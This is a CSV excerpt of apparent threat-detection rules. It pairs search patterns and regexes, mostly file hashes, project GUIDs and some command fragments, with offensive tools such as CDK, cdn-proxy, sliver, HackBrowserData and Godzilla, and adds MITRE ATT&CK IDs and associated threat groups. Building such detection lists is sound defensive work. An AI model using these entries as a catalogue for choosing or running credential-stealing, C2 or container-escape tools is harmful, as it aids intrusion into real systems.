"*cdk run mount-cgroup *shell-cmd-payloads*",".{0,1000}cdk\srun\smount\-cgroup\s.{0,1000}shell\-cmd\-payloads.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","37919"
"*cdk-fabric run service-probe 127.0.0.1*",".{0,1000}cdk\-fabric\srun\sservice\-probe\s127\.0\.0\.1.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","37920"
"*cdk-team/CDK*",".{0,1000}cdk\-team\/CDK.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","1","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","37921"
"*cdn_proxy cloudflare ",".{0,1000}cdn_proxy\scloudflare\s","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","N/A","3","249","24","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z","37923"
"*cdn_proxy_burp_ext.py*",".{0,1000}cdn_proxy_burp_ext\.py.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","1","N/A","N/A","N/A","3","249","24","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z","37924"
"*cdn-proxy -*",".{0,1000}cdn\-proxy\s\-.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","N/A","3","249","24","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z","37925"
"*cdn-proxy cloudfront *",".{0,1000}cdn\-proxy\scloudfront\s.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","N/A","3","249","24","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z","37926"
"*cdn-proxy.git*",".{0,1000}cdn\-proxy\.git.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","1","N/A","N/A","N/A","3","249","24","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z","37927"
"*cdn-proxy/burp_extension*",".{0,1000}cdn\-proxy\/burp_extension.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","1","N/A","N/A","N/A","3","249","24","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z","37928"
"*Cdn-Proxy-Host*",".{0,1000}Cdn\-Proxy\-Host.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","1","N/A","N/A","N/A","3","249","24","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z","37929"
"*Cdn-Proxy-Origin*",".{0,1000}Cdn\-Proxy\-Origin.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","N/A","3","249","24","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z","37930"
"*cdn-scanner -*",".{0,1000}cdn\-scanner\s\-.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","N/A","3","249","24","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z","37931"
"*ce07cff17e7a4c5ee5331823d8e664013500cf83e6783d720ad7f09160712229*",".{0,1000}ce07cff17e7a4c5ee5331823d8e664013500cf83e6783d720ad7f09160712229.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37932"
"*ce0ae1416a4841144e8a377eed2a11fef988b08042606bac8121b4a4abd5391e*",".{0,1000}ce0ae1416a4841144e8a377eed2a11fef988b08042606bac8121b4a4abd5391e.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","37933"
"*ce0ae1416a4841144e8a377eed2a11fef988b08042606bac8121b4a4abd5391e*",".{0,1000}ce0ae1416a4841144e8a377eed2a11fef988b08042606bac8121b4a4abd5391e.{0,1000}","offensive_tool_keyword","BrowserGhost","This is a tool for grabbing browser passwords","T1555.003 - T1555.013 - T1003.008","TA0006","N/A","N/A","Credential Access","https://github.com/QAX-A-Team/BrowserGhost","1","0","#filehash","N/A","10","10","1414","206","2022-05-21T14:09:45Z","2020-06-12T12:19:06Z","37934"
"*ce137e86b9a64ee2424a5da774398fb01a1488c50038fcc883c8bbcb2fa82ea9*",".{0,1000}ce137e86b9a64ee2424a5da774398fb01a1488c50038fcc883c8bbcb2fa82ea9.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","37935"
"*ce14d0dea73e7da1599d098035aca77ad80388cf3f9c8f8a39aefc90cfae59a7*",".{0,1000}ce14d0dea73e7da1599d098035aca77ad80388cf3f9c8f8a39aefc90cfae59a7.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37936"
"*ce189906ea564b5bd6d924791d90b65a3c56d4313d45bdab310145e55a042b6f*",".{0,1000}ce189906ea564b5bd6d924791d90b65a3c56d4313d45bdab310145e55a042b6f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37938"
"*ce2047b5a3ce8608ac3203f14284542cd895fbf67a0a400a9353ba7b3a9f188b*",".{0,1000}ce2047b5a3ce8608ac3203f14284542cd895fbf67a0a400a9353ba7b3a9f188b.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","37939"
"*CE2307EB-A69E-0EB9-386C-D322223A10A9*",".{0,1000}CE2307EB\-A69E\-0EB9\-386C\-D322223A10A9.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","#GUIDproject","N/A","9","","N/A","","","","37940"
"*CE23F388-34F5-4543-81D1-91CD244C9CB1*",".{0,1000}CE23F388\-34F5\-4543\-81D1\-91CD244C9CB1.{0,1000}","offensive_tool_keyword","impacketremoteshell","install a legit application and interface with it over smb w/o the signature of cmd.exe / powershell.exe being called or the redirection typically used by those techniques","T1077 - T1059.007 - T1569.001","TA0008 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","37941"
"*ce26833cea9cc46a3fc2b6418de85ce94dd4d190cca15757ba40fec475487e73*",".{0,1000}ce26833cea9cc46a3fc2b6418de85ce94dd4d190cca15757ba40fec475487e73.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37942"
"*ce26cac7b0d52a3922cc05a777bb83025430a6a5d31104840a0099d7bd0cb2f4*",".{0,1000}ce26cac7b0d52a3922cc05a777bb83025430a6a5d31104840a0099d7bd0cb2f4.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","37943"
"*ce2e6ef4cc10bd9de836c9de164dd80e043d713ef1ee3425b5bc29f4c7c6e39e*",".{0,1000}ce2e6ef4cc10bd9de836c9de164dd80e043d713ef1ee3425b5bc29f4c7c6e39e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37945"
"*ce310ab611895db1767877bd1f635ee3c4350d6e17ea28f8d100313f62b87382*",".{0,1000}ce310ab611895db1767877bd1f635ee3c4350d6e17ea28f8d100313f62b87382.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","37947"
"*ce3f57bd1bf1d9e32bfccd801768765cf7b4b20c4cac0a61ea4cfde74832a0d2*",".{0,1000}ce3f57bd1bf1d9e32bfccd801768765cf7b4b20c4cac0a61ea4cfde74832a0d2.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37950"
"*ce4255704740f395be5713b049b97814ce537c440b1249850bcb62794dcc7f56*",".{0,1000}ce4255704740f395be5713b049b97814ce537c440b1249850bcb62794dcc7f56.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","0","#filehash","N/A","10","2","167","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z","37951"
"*ce43f1e8e27c93b61b84c4024f7f9321c2755d6a5fd679f4d8324aadfd7ad76f*",".{0,1000}ce43f1e8e27c93b61b84c4024f7f9321c2755d6a5fd679f4d8324aadfd7ad76f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37952"
"*ce4821d0b380319df17ce6166db15577abd9e77d090d15c83fa67545174f4631*",".{0,1000}ce4821d0b380319df17ce6166db15577abd9e77d090d15c83fa67545174f4631.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","37953"
"*ce4abd249e1f6497549ca7a2e814c8232f42597ce8b02f77fd3dde31a723a501*",".{0,1000}ce4abd249e1f6497549ca7a2e814c8232f42597ce8b02f77fd3dde31a723a501.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","37954"
"*ce514ccbb11797a5e0457b8da2cf4914b753928dcc15d59d4db2d2b5ffcd061b*",".{0,1000}ce514ccbb11797a5e0457b8da2cf4914b753928dcc15d59d4db2d2b5ffcd061b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37957"
"*CE5C7EF9-E890-48E5-8551-3E8F96DCB38F*",".{0,1000}CE5C7EF9\-E890\-48E5\-8551\-3E8F96DCB38F.{0,1000}","offensive_tool_keyword","nsocks",".NET HttpClient proxy handler implementation for SOCKS proxies","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider* - Black Basta","C2","https://github.com/bbepis/Nsocks","1","0","#GUIDproject","N/A","8","10","3","0","2020-06-08T17:25:07Z","2020-03-28T09:00:22Z","37960"
"*ce613fc8-3f97-4989-bc90-2027463ea37d*",".{0,1000}ce613fc8\-3f97\-4989\-bc90\-2027463ea37d.{0,1000}","offensive_tool_keyword","HookSentry","tool for inspecting system DLLs loaded into processes - looking for functions hooked from AV/EDR.","T1055.001 - T1055 - T1057","TA0007 - TA0005","N/A","N/A","Defense Evasion","https://github.com/UmaRex01/HookSentry","1","0","#GUIDproject","N/A","6","1","27","2","2025-04-02T12:30:58Z","2024-11-20T18:09:39Z","37962"
"*CE61ADEE-C032-43EC-ACD8-E4A742F894A3*",".{0,1000}CE61ADEE\-C032\-43EC\-ACD8\-E4A742F894A3.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","37963"
"*ce70b1200ce76360dec6129189daa260779901d01f150868c9f19ec6cea77b36*",".{0,1000}ce70b1200ce76360dec6129189daa260779901d01f150868c9f19ec6cea77b36.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","37966"
"*ce75590d1d79bc808d98b70ec03355d1117ca54c3b49b6ba474aa704ea9a6c2e*",".{0,1000}ce75590d1d79bc808d98b70ec03355d1117ca54c3b49b6ba474aa704ea9a6c2e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37967"
"*ce75ede7827b5a067bb11a5153e3046286251acaf1e92fd3edf4a46e506b5968*",".{0,1000}ce75ede7827b5a067bb11a5153e3046286251acaf1e92fd3edf4a46e506b5968.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","37968"
"*ce7979010bdb291a0a1884e00e238d9fc3bc27ec7a1d1093be273c22e865f676*",".{0,1000}ce7979010bdb291a0a1884e00e238d9fc3bc27ec7a1d1093be273c22e865f676.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","37969"
"*ce820866d58afd4f191053c7871032a69a3b7cf923ec47996738a151ddc61254*",".{0,1000}ce820866d58afd4f191053c7871032a69a3b7cf923ec47996738a151ddc61254.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","37971"
"*CE895D82-85AA-41D9-935A-9625312D87D0*",".{0,1000}CE895D82\-85AA\-41D9\-935A\-9625312D87D0.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","#GUIDproject","N/A","10","10","260","47","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z","37972"
"*ce8a96ade87a39ebb8e4dc1602ab2b80cef1fffc317b557c258839223c65667c*",".{0,1000}ce8a96ade87a39ebb8e4dc1602ab2b80cef1fffc317b557c258839223c65667c.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","37973"
"*ce8cdc354e0ff5b4aa329e1ef3e55aaabfcb1a592c697b327e93b59f5ae9a217*",".{0,1000}ce8cdc354e0ff5b4aa329e1ef3e55aaabfcb1a592c697b327e93b59f5ae9a217.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","37974"
"*ce9ae24722afd760de25a8961c4446b64235936b8ac8d1c2c25625d4feaee6e6*",".{0,1000}ce9ae24722afd760de25a8961c4446b64235936b8ac8d1c2c25625d4feaee6e6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37975"
"*cea27c53085b6cf1d9505957144aa23b794550da5746e6a38a212a03b505e157*",".{0,1000}cea27c53085b6cf1d9505957144aa23b794550da5746e6a38a212a03b505e157.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","#filehash","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","37979"
"*ceb602555ade094f60b02d5b68f2d76efa615cd1bfb05de20a6452e496353fc2*",".{0,1000}ceb602555ade094f60b02d5b68f2d76efa615cd1bfb05de20a6452e496353fc2.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","37980"
"*cec47972c55b72e21161ef0c26125d86c544b5aa1d95915347220935412a591a*",".{0,1000}cec47972c55b72e21161ef0c26125d86c544b5aa1d95915347220935412a591a.{0,1000}","offensive_tool_keyword","PrivFu","Tool to execute token assigned process","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","TokenAssignor","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","37982"
"*cecbe047e33d2dc3bc06cc7a62546a4e1a793d8da1dde4ba3aa021f944930d6d*",".{0,1000}cecbe047e33d2dc3bc06cc7a62546a4e1a793d8da1dde4ba3aa021f944930d6d.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#filehash","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","37985"
"*cecbe047e33d2dc3bc06cc7a62546a4e1a793d8da1dde4ba3aa021f944930d6d*",".{0,1000}cecbe047e33d2dc3bc06cc7a62546a4e1a793d8da1dde4ba3aa021f944930d6d.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","37986"
"*cee0283b58fa5fb0742f230a70f8a69cb283914e886d7a332b22eaf25b48f4ce*",".{0,1000}cee0283b58fa5fb0742f230a70f8a69cb283914e886d7a332b22eaf25b48f4ce.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37988"
"*cee1f314c34ecccd4fcb94d0715126130d02aeb153ec8504fbbae67c244cdb45*",".{0,1000}cee1f314c34ecccd4fcb94d0715126130d02aeb153ec8504fbbae67c244cdb45.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","37989"
